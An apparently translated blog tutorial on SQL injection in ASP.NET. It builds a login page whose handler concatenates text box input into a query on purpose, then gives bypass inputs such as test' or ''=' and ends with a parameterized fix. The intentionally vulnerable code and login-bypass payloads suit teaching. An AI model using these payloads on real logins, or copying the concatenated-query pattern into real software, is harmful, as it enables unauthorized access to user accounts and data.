
ASP.NET SQL Injection Example

2015-10-10 14:54, 711 views



1. Add the connection string to web.config:

<configuration>
  <connectionStrings>
    <add name="myConnectionString"
         connectionString="Server=10.231.248.177;Database=testdb;User ID=sa;Password=pa$$word;Trusted_Connection=False;"
         providerName="System.Data.SqlClient"/>
  </connectionStrings>
</configuration>


2. Drag a few controls onto the form:

<form id="form1" runat="server">
  <div>
    <asp:Label ID="LU" runat="server" Text="User Name:"></asp:Label>
    <asp:TextBox ID="TBU" runat="server"></asp:TextBox>
    <br/>
    <asp:Label ID="LP" runat="server" Text="Password:"></asp:Label>
    <asp:TextBox ID="TBP" runat="server"></asp:TextBox>
    <br/>
    <asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" />
  </div>
</form>


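3. Write the login event handler:

// Required at the top of the code-behind file:
// using System; using System.Data; using System.Data.SqlClient; using System.Web.Configuration;
protected void Login_Click(object sender, EventArgs e)
{
    using (SqlConnection con = new SqlConnection(WebConfigurationManager.ConnectionStrings["myConnectionString"].ConnectionString))
    {
        con.Open();
        SqlCommand cmd = new SqlCommand();
        // Vulnerable on purpose: the text box values are concatenated straight into the SQL text.
        cmd.CommandText = "SELECT Count(1) FROM [User] where UserName='" + TBU.Text.Trim() + "' and Password='" + TBP.Text.Trim() + "'";
        cmd.CommandType = CommandType.Text;
        cmd.Connection = con;
        int count = (int)cmd.ExecuteScalar();
        // Echo the final SQL so the effect of the input is visible on the page.
        Response.Write(cmd.CommandText);
        if (count > 0)
        {
            Response.Write("<script>alert('Login pass!');</script>");
        }
        else
        {
            Response.Write("<script>alert('Login fail!');</script>");
        }
    }
}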


4. Construct a SQL injection login:

User name: test' or ''='
Password: ' or ''='
or
User name: test
Password: ' or ''='
As shown in the screenshot:





Other ASP.NET SQL injection examples, for reference if you are interested:
http://www.aspsnippets.com/Articles/SQL-Injection-Attack-its-examples-and-Prevention-mechanisms-and-Techniques-in-ASPNet.aspx
http://www.codeproject.com/Articles/459324/Understading-SQL-Injection-and-Creating-SQL-Inject
http://blogs.iis.net/nazim/sql-injection-demo
More on SQL injection in general: http://www.unixwiz.net/techtips/sql-injection.html
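
An added example (not code from the original post): a parameterized version of the step 3 handler, in which the step 4 inputs are compared as plain string values instead of being parsed as part of the SQL. The class name LoginPage and the NVARCHAR(50) column size are assumptions; the control names and the connection string name are the ones from steps 1 to 3.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web.Configuration;

// Assumption: "LoginPage" is a hypothetical name for the page's code-behind class.
public partial class LoginPage : System.Web.UI.Page
{
    // Assumption: UserName and Password are NVARCHAR(50) columns in [User].
    private const int MaxLen = 50;

    protected void Login_Click(object sender, EventArgs e)
    {
        string user = TBU.Text.Trim();
        string pass = TBP.Text.Trim();

        // Reject input that cannot match any stored value before touching the database.
        if (user.Length == 0 || user.Length > MaxLen || pass.Length > MaxLen)
        {
            Response.Write("<script>alert('Login fail!');</script>");
            return;
        }

        string cs = WebConfigurationManager.ConnectionStrings["myConnectionString"].ConnectionString;
        using (SqlConnection con = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand(
            "SELECT COUNT(1) FROM [User] WHERE UserName = @user AND Password = @pass", con))
        {
            // The SQL text is constant; the values are sent separately as typed
            // parameters, so a quote in the input stays data and cannot end the literal.
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, MaxLen).Value = user;
            cmd.Parameters.Add("@pass", SqlDbType.NVarChar, MaxLen).Value = pass;

            con.Open();
            int count = (int)cmd.ExecuteScalar();

            // Unlike step 3, the query text is not echoed back to the browser.
            Response.Write(count > 0
                ? "<script>alert('Login pass!');</script>"
                : "<script>alert('Login fail!');</script>");
        }
    }
}
```

With this handler, entering test' or ''=' as the user name only succeeds if a row with exactly that user name and the given password exists.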

